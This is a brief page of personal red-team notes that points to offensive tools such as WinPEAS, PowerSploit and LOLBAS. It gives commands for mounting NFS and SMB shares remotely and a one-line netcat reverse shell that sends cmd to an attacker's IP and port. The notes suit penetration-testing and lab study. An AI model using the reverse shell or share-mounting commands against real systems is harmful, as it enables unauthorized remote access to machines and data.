Red Team Notes

Sorted Linux notes, need to separate to different pages and reorganize

living off the land binaries: LOLBAS

Enumeration

Windows Privilege Escalation Enumeration Script: WinPEAS

Little bit o' everything: PowerSploit

Shares

Mounting NFS Shares Remotely

showmount -e <ip>
<list of mounts>
mkdir /tmp/<foldername?
mount -t nfs <ip>:/<mount-folder> /tmp/<foldername>

Using smbmount

smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw

Where /mnt/remote is the local folder to mount the share to.

Unsorted

Netcat reverse shell (after uploading the binary!): nc64.exe -e cmd <ip port>

5KFB6 tools: https://specterops.io/resources/research-and-development

easy windows shell: unicorn.py trustedsec/unicorn HackTheBox - Arctic

system information: sysinfo

Get user id: getuid

Powershell privilege escalation:

fuzzbunch: exploit tool similar to metasploit

check what updates are installed: type WindowsUpdate.log

net use share from linux [like SimpleHTTPServer for Samba]: impacket-smbserver <sharename> '<dir_to_share>'

If you like this content and would like to see more, please consider buying me a coffee!

Last updated

Was this helpful?